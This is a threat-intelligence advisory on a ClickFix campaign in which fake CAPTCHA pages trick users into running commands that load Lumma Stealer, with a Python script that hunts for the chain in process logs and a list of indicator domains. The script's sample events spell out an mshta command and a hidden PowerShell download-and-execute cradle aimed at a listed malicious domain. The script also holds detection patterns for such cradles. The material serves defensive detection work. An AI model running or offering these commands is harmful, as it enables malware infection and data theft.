Fake CAPTCHA Lures Victims: Lumma Stealer Abuses Clipboard and PowerShell

Feb. 26, 2025, 8:54 a.m.

Description

A malware campaign that delivers Lumma Stealer through fake CAPTCHA pages has been identified. It uses ClickFix, a social-engineering technique in which a phishing page presents a fake reCAPTCHA or Cloudflare-style "verify you are human" prompt. The page silently copies a malicious command to the victim's clipboard and instructs them to paste and run it as part of the "verification", so the victim launches the first stage themselves. That command starts mshta.exe, which executes a VBScript that in turn runs PowerShell commands; the PowerShell stage downloads and executes a payload that acts as a loader for Lumma Stealer. The chain employs several evasion techniques, including anti-debugging checks and code injection. Once running, the stealer captures screen data, reads clipboard contents, and exfiltrates the stolen data to multiple command-and-control servers.
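As an added example (not part of the original advisory and not code from the campaign), the following Python hunts for the chain described above in process-creation telemetry. The event records are constructed to resemble Sysmon Event ID 1 fields, and the URL paths in them are invented; the domains are the ones listed under Indicators on this page. The command-line heuristics (mshta.exe given an http(s) URL, PowerShell spawned by a script host, download-cradle switches, a parent of explorer.exe for a pasted Run command) are this example's own assumptions about how the chain appears in logs, not details taken from the page.

```python
"""ClickFix / mshta / PowerShell chain hunt over process-creation events.

Added example for this advisory, not code from the campaign or the page.
Event records and URL paths are constructed; IOC domains are those listed
under "Indicators" on this page.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

IOC_DOMAINS = {
    "voicesharped.com", "torpdidebar.com", "rebeldettern.com", "kvndbb3.com",
    "importenptoc.com", "hopeefreamed.com", "garulouscuto.com", "deskbot.net",
    "breedertremnd.com", "ignoredshee.com", "actiothreaz.com",
}

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
# Switches and cradle verbs typical of pasted one-liners (assumed heuristics).
PS_CRADLE_RE = re.compile(
    r"(-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|downloadstring|downloadfile"
    r"|invoke-webrequest|\biwr\b|\biex\b|invoke-expression)", re.I)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


@dataclass(frozen=True)
class ProcEvent:
    """Subset of Sysmon Event ID 1 (process creation) fields."""
    pid: int
    parent_pid: int
    image: str
    parent_image: str
    command_line: str


# Constructed sample telemetry: one ClickFix chain plus two benign look-alikes.
SAMPLE_EVENTS = [
    ProcEvent(1001, 900, r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\userinit.exe", "explorer.exe"),
    # Victim pastes the lure's command into the Run dialog (parent = explorer.exe).
    ProcEvent(1120, 1001, r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              "mshta https://voicesharped.com/verify.mp4"),  # URL path is invented
    # VBScript in the fetched HTA content spawns PowerShell with a download cradle.
    ProcEvent(1133, 1120, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\mshta.exe",
              "powershell -w hidden -nop -ep bypass -c \"iex (New-Object Net.WebClient)"
              ".DownloadString('https://voicesharped.com/loader.ps1')\""),  # path invented
    # Benign: a local .hta opened by double-click.
    ProcEvent(1140, 1001, r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              r"mshta C:\Users\alice\Downloads\report.hta"),
    # Benign: scheduled inventory script.
    ProcEvent(1150, 700, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\svchost.exe", r"powershell -File C:\scripts\inventory.ps1"),
]


def base_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ioc_hits(command_line: str) -> List[str]:
    """IOC domains referenced by URLs in a command line, subdomains included."""
    hits = set()
    for host in URL_RE.findall(command_line):
        host = host.lower()
        if host in IOC_DOMAINS or any(host.endswith("." + d) for d in IOC_DOMAINS):
            hits.add(host)
    return sorted(hits)


def classify(ev: ProcEvent) -> List[str]:
    """Per-event reasons; an empty list means no rule fired."""
    reasons: List[str] = []
    image, parent = base_name(ev.image), base_name(ev.parent_image)
    if image == "mshta.exe" and URL_RE.search(ev.command_line):
        reasons.append("mshta_remote_content")
        if parent == "explorer.exe":
            reasons.append("mshta_interactive_launch")  # consistent with a pasted Run command
    if image in POWERSHELL:
        if parent in SCRIPT_HOSTS:
            reasons.append("powershell_from_script_host")
        if PS_CRADLE_RE.search(ev.command_line):
            reasons.append("powershell_download_cradle")
    for host in ioc_hits(ev.command_line):
        reasons.append("ioc_domain:" + host)
    return reasons


def hunt(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map pid -> reasons for every event that triggered at least one rule."""
    return {ev.pid: r for ev in events if (r := classify(ev))}


def full_chains(events: List[ProcEvent]) -> List[Tuple[int, int, int]]:
    """(explorer_pid, mshta_pid, powershell_pid) for explorer -> mshta -> PowerShell."""
    by_pid = {ev.pid: ev for ev in events}
    chains = []
    for ps in events:
        if base_name(ps.image) not in POWERSHELL:
            continue
        hta = by_pid.get(ps.parent_pid)
        if hta is None or base_name(hta.image) != "mshta.exe":
            continue
        if base_name(hta.parent_image) == "explorer.exe":
            chains.append((hta.parent_pid, hta.pid, ps.pid))
    return chains


if __name__ == "__main__":
    for pid, reasons in hunt(SAMPLE_EVENTS).items():
        print(pid, reasons)
    print("full chains:", full_chains(SAMPLE_EVENTS))
```

The per-event rules in classify() fire on behaviour rather than on the domain list, so the two lure-driven events are flagged even if the campaign rotates infrastructure; ioc_hits() only adds confidence when one of the listed domains appears. full_chains() joins the events on parent PID, which is the signal that separates a user pasting a lure into the Run dialog from legitimate mshta.exe or PowerShell use on the same host; the two benign look-alikes produce no findings.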

Date

  • Created: Feb. 25, 2025, 7:40 p.m.
  • Published: Feb. 25, 2025, 7:40 p.m.
  • Modified: Feb. 26, 2025, 8:54 a.m.

Indicators

  • voicesharped.com
  • torpdidebar.com
  • rebeldettern.com
  • kvndbb3.com
  • importenptoc.com
  • hopeefreamed.com
  • garulouscuto.com
  • deskbot.net
  • breedertremnd.com
  • ignoredshee.com
  • actiothreaz.com

Attack Patterns

  • Lumma Stealer